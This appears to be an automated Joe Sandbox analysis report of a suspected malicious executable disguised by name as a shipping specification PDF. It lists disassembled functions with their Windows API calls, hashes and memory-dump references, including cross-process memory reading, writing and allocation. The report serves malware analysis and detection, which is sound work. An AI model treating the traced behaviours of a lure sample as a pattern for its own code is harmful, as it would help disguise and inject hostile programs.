                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                      • String ID:
                                      • API String ID: 3741023627-0
                                      • Opcode ID: 81d471be8b861655e841c4e0e5558cf48055bdc90ebfc6df2ada8281143b0b7b
                                      • Instruction ID: afda34c6342097eea55e29691c0819d23806fd0027d12b24880c89c25b03e19f
                                      • Opcode Fuzzy Hash: 81d471be8b861655e841c4e0e5558cf48055bdc90ebfc6df2ada8281143b0b7b
                                      • Instruction Fuzzy Hash: F1016D34500715ABEB375B10DE4EF9677BCBB04B05F0045A9F686A54E0DBF4BA54CB44
                                      Function 0035B0AB Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                      Download Yara Rule
                                      APIs
                                      • EndPath.GDI32(?), ref: 0035B0BA
                                      • StrokeAndFillPath.GDI32(?,?,003BE680,00000000,?,?,?), ref: 0035B0D6
                                      • SelectObject.GDI32(?,00000000), ref: 0035B0E9
                                      • DeleteObject.GDI32 ref: 0035B0FC
                                      • StrokePath.GDI32(?), ref: 0035B117
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                      • String ID:
                                      • API String ID: 2625713937-0
                                      • Opcode ID: 2232623dea31af6cd6daa0445b0216fc6a3e7d2c4b62902ca2228f8cf2394ba2
                                      • Instruction ID: 908d28fd08589c3323ac58d6fc00fd62d686dc1addae9dfe1915b40ef7536e49
                                      • Opcode Fuzzy Hash: 2232623dea31af6cd6daa0445b0216fc6a3e7d2c4b62902ca2228f8cf2394ba2
                                      • Instruction Fuzzy Hash: CCF0EC30000644EFDB639F69EE4DB597FA9B710362F088725F825950F0C7729959DF54
                                      Function 003916DA Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 309COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: X$p2?l2?
                                      • API String ID: 0-3124981581
                                      • Opcode ID: 8e7786b734be4175496fcc1418076832c678c136d29933a33ecc2a445feff375
                                      • Instruction ID: b409f9a5feed45ed348b3fe8d96d162c6c4283995d6df73253c9d81ae0271178
                                      • Opcode Fuzzy Hash: 8e7786b734be4175496fcc1418076832c678c136d29933a33ecc2a445feff375
                                      • Instruction Fuzzy Hash: DCC18F355043419FCB66EF24C941AAAB7E4FF85350F00492DF9999F2A2DB70ED05CB82
                                      Function 0038F23D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CoInitialize.OLE32(00000000), ref: 0038F2DA
                                      • CoCreateInstance.OLE32(003CDA7C,00000000,00000001,003CD8EC,?), ref: 0038F2F2
                                      • CoUninitialize.OLE32 ref: 0038F555
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: CreateInitializeInstanceUninitialize
                                      • String ID: .lnk
                                      • API String ID: 948891078-24824748
                                      • Opcode ID: 24c9c4a6c6bb7036d1ca7d5e0bbea444fdc8027b9d8688e4ce349a5d75cbfefa
                                      • Instruction ID: e7a13b3f0891bfe8367f9cab395e22c8b1b1bc349835b30e3e98885ce4e9151a
                                      • Opcode Fuzzy Hash: 24c9c4a6c6bb7036d1ca7d5e0bbea444fdc8027b9d8688e4ce349a5d75cbfefa
                                      • Instruction Fuzzy Hash: 77A14C71104301AFD302EF64C881EABB7ECEF99714F00495DF5559B2A2EB70EA49CB52
                                      Function 0038E7DD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0034660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003453B1,?,?,003461FF,?,00000000,00000001,00000000), ref: 0034662F
                                      • CoInitialize.OLE32(00000000), ref: 0038E85D
                                      • CoCreateInstance.OLE32(003CDA7C,00000000,00000001,003CD8EC,?), ref: 0038E876
                                      • CoUninitialize.OLE32 ref: 0038E893
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: CreateFullInitializeInstanceNamePathUninitialize
                                      • String ID: .lnk
                                      • API String ID: 3769357847-24824748
                                      • Opcode ID: 8a86008b57f9976ed0e5ea8c244137033bf9d81a4d9a0ea25d9e4a31e0d52878
                                      • Instruction ID: 9010150a3e71575910db39baa6c6e3e870ca54d4d17669b385c80a9191caa34a
                                      • Opcode Fuzzy Hash: 8a86008b57f9976ed0e5ea8c244137033bf9d81a4d9a0ea25d9e4a31e0d52878
                                      • Instruction Fuzzy Hash: EDA154356043019FCB16EF14C484E6ABBE5BF89710F058999F99A9B3A2CB31FC45CB81
                                      Function 003A2230 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 191COMMON
                                      Download Yara Rule
                                      APIs
                                      • ShellExecuteExW.SHELL32(?), ref: 003A2368
                                      • CloseHandle.KERNEL32(00000000), ref: 003A242F
                                      • FreeLibrary.KERNEL32(00000000), ref: 003A243E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: CloseExecuteFreeHandleLibraryShell
                                      • String ID: @
                                      • API String ID: 2646349028-2766056989
                                      • Opcode ID: 7707456315ae693187413e6395bae5ddac98c55569bf0fae9fdddf8840248e58
                                      • Instruction ID: 5079938de42c4fbd11d3a2c863e3969c2ce58249d2e5e01c407536ef24a0aaa3
                                      • Opcode Fuzzy Hash: 7707456315ae693187413e6395bae5ddac98c55569bf0fae9fdddf8840248e58
                                      • Instruction Fuzzy Hash: 59716174A006199FCF16EF98C8819AEB7F5FF49310F118459E856AF3A1DB34AD40CB90
                                      Function 00385347 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetMenuItemInfoW.USER32(?), ref: 00385467
                                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00385513
                                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0038553D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: ItemMenu$Info$Default
                                      • String ID: 0
                                      • API String ID: 1306138088-4108050209
                                      • Opcode ID: 478dcc94afa328d3e3d77a0dbde5357b8913534f3f2e6bccca5c0b3eed2d7ec2
                                      • Instruction ID: fd8f8805d5e24b2d851a2dd86bf47f5fa601558f7d89966d576ea6a0ef310e29
                                      • Opcode Fuzzy Hash: 478dcc94afa328d3e3d77a0dbde5357b8913534f3f2e6bccca5c0b3eed2d7ec2
                                      • Instruction Fuzzy Hash: 505102712047019BD717AF28C841BABBBE8AF86350F1506AAF896D71E0DBB0DD448B52
                                      Function 00384606 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON
                                      Download Yara Rule
                                      APIs
                                      • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,003DDC50,?,0000000F,0000000C,00000016,003DDC50,?), ref: 00384645
                                      • CharUpperBuffW.USER32(?,?,00000000,?), ref: 003846C5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: BuffCharUpper
                                      • String ID: REMOVE$THIS
                                      • API String ID: 3964851224-776492005
                                      • Opcode ID: 34c1463aa1f5bcab3aa28e1bfb647144b6f1a4d5b7d76f2c1e4dcf572a1a2e93
                                      • Instruction ID: 77d769cf1468961bb1d522aa026d9222460629605a2b201531777a2f72db70e6
                                      • Opcode Fuzzy Hash: 34c1463aa1f5bcab3aa28e1bfb647144b6f1a4d5b7d76f2c1e4dcf572a1a2e93
                                      • Instruction Fuzzy Hash: 49414F74A0021A9FCF06EF64C881AAEB7B5FF49304F1480A9F956AF661D734ED45CB50
                                      Function 0037C189 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0038430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0037BC08,?,?,00000034,00000800,?,00000034), ref: 00384335
                                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0037C1D3
                                        • Part of subcall function 003842D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0037BC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00384300
                                        • Part of subcall function 0038422F: GetWindowThreadProcessId.USER32(?,?), ref: 0038425A
                                        • Part of subcall function 0038422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0037BBCC,00000034,?,?,00001004,00000000,00000000), ref: 0038426A
                                        • Part of subcall function 0038422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0037BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00384280
                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0037C240
                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0037C28D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                      • String ID: @
                                      • API String ID: 4150878124-2766056989
                                      • Opcode ID: 6930892c48bb3461f7d75f02ecb619a3845086fd259d582a9ed05eec691889fd
                                      • Instruction ID: 7da4488d468da707deaae12b3b6c0be081efdf1761b55fe66bef5d11228de72d
                                      • Opcode Fuzzy Hash: 6930892c48bb3461f7d75f02ecb619a3845086fd259d582a9ed05eec691889fd
                                      • Instruction Fuzzy Hash: 6E414E7690021DBFDB12EFA4CC81AEEB7B8AF09300F004499FA45BB181DA756E45CB61
                                      Function 00385007 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetMenuItemInfoW.USER32 ref: 00385091
                                      • DeleteMenu.USER32(00000004,00000007,00000000), ref: 003850D7
                                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00401708,00000000), ref: 00385120
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Menu$Delete$InfoItem
                                      • String ID: 0
                                      • API String ID: 135850232-4108050209
                                      • Opcode ID: 5b9041fa8968e10fc6e7203747ee77885a3fd1a7c0fca00c0d9af566fa25af6c
                                      • Instruction ID: e94c8239dffc1bd2a3f2db5d14e32a9caa4ee41ad6e16f37d4dba5f370ec688d
                                      • Opcode Fuzzy Hash: 5b9041fa8968e10fc6e7203747ee77885a3fd1a7c0fca00c0d9af566fa25af6c
                                      • Instruction Fuzzy Hash: C241F571204701AFDB22EF24DC84F2ABBE9AF85314F04469EF8559B391D730E904CB62
                                      Function 003AA63F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,003DDC00,00000000,?,?,?,?), ref: 003AA6D8
                                      • GetWindowLongW.USER32 ref: 003AA6F5
                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 003AA705
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Window$Long
                                      • String ID: SysTreeView32
                                      • API String ID: 847901565-1698111956
                                      • Opcode ID: 812b2cd872a446565bc02d4d24e79bd455d4baec800857b269f71c7087df778f
                                      • Instruction ID: 17e4b9a4e06ef2e38cee95db115bd6f944229aca0628d6af39bc101d31032e6e
                                      • Opcode Fuzzy Hash: 812b2cd872a446565bc02d4d24e79bd455d4baec800857b269f71c7087df778f
                                      • Instruction Fuzzy Hash: 98319032100A05ABDB128E74CC45FEB77A9EB4A324F254725F975932E0CB75AC50DB50
                                      Function 003AA0D6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 003AA15E
                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 003AA172
                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 003AA196
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: MessageSend$Window
                                      • String ID: SysMonthCal32
                                      • API String ID: 2326795674-1439706946
                                      • Opcode ID: ec109910077ee45d0af9be9ed875f083cdab414e0974df1a0528e6ce747d7fc3
                                      • Instruction ID: 9491aeb65faa9ed33e9cdec7059fe091d7c35059da3a09f90fd85d951df9fee9
                                      • Opcode Fuzzy Hash: ec109910077ee45d0af9be9ed875f083cdab414e0974df1a0528e6ce747d7fc3
                                      • Instruction Fuzzy Hash: 0221AB33500618BBEF128FA4CC82FEA3B7AEF49714F110214FA55AB190D7B5AC55CBA0
                                      Function 003AA88A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 003AA941
                                      • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 003AA94F
                                      • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 003AA956
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: MessageSend$DestroyWindow
                                      • String ID: msctls_updown32
                                      • API String ID: 4014797782-2298589950
                                      • Opcode ID: 7bccadcdf9d07575a9c094fd1b5118ff39351a5d58e8854aa007f80b1a927bf7
                                      • Instruction ID: a2ce96dfc4fc017371ca6c8c9ecca0bbfe1035b9abe687eff71b71bd10052ee9
                                      • Opcode Fuzzy Hash: 7bccadcdf9d07575a9c094fd1b5118ff39351a5d58e8854aa007f80b1a927bf7
                                      • Instruction Fuzzy Hash: C92171B660060AAFEB12DF18CC91DB737ADEF5A3A4B45055DFA049B261CB31EC11CB61
                                      Function 003A99A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 003A9A30
                                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 003A9A40
                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 003A9A65
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: MessageSend$MoveWindow
                                      • String ID: Listbox
                                      • API String ID: 3315199576-2633736733
                                      • Opcode ID: 97c56d23a5ecb1920866fd83359e74d7a91b38a305826e5e053ec511717cf0ca
                                      • Instruction ID: 9c955436a549e4f508bd2639efe7ac9715c38c140804038caa7f4eeb8ef447eb
                                      • Opcode Fuzzy Hash: 97c56d23a5ecb1920866fd83359e74d7a91b38a305826e5e053ec511717cf0ca
                                      • Instruction Fuzzy Hash: 4A218631610118BFDB128F54CC85FBB3BAEEF8A750F11412AF954AB190C7719C518790
                                      Function 0038DAF6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 0038DB0A
                                      • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0038DB5E
                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000,003DDC00), ref: 0038DBB5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: ErrorMode$InformationVolume
                                      • String ID: %lu
                                      • API String ID: 2507767853-685833217
                                      • Opcode ID: 9acd768d4ff1a2db254c4b5e97aa47b4ee3787afcdc8dc8492b651b23063993e
                                      • Instruction ID: 36b5f9bd0677c5deaaac1661082ce4194540701130894f65273e3e4aab91f4a8
                                      • Opcode Fuzzy Hash: 9acd768d4ff1a2db254c4b5e97aa47b4ee3787afcdc8dc8492b651b23063993e
                                      • Instruction Fuzzy Hash: 5C215335A00208AFCB12EF65D985DEEBBF8EF49704B1440A9F509DB251DB71EA41CB61
                                      Function 0037C9E0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0037C82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0037C84A
                                        • Part of subcall function 0037C82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 0037C85D
                                        • Part of subcall function 0037C82D: GetCurrentThreadId.KERNEL32 ref: 0037C864
                                        • Part of subcall function 0037C82D: AttachThreadInput.USER32(00000000), ref: 0037C86B
                                      • GetFocus.USER32 ref: 0037CA05
                                        • Part of subcall function 0037C876: GetParent.USER32(?), ref: 0037C884
                                      • GetClassNameW.USER32(?,?,00000100), ref: 0037CA4E
                                      • EnumChildWindows.USER32(?,0037CAC4), ref: 0037CA76
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows
                                      • String ID: %s%d
                                      • API String ID: 2776554818-1110647743
                                      • Opcode ID: 6c19e4a149d0e43e3723e68e3437fb9765923b755d1c35b307cf2278a90c13ac
                                      • Instruction ID: da71f5ecd25b613e6ec3d3d06ec88c97ce869ce89ebf99ac9adfb291cf325d7b
                                      • Opcode Fuzzy Hash: 6c19e4a149d0e43e3723e68e3437fb9765923b755d1c35b307cf2278a90c13ac
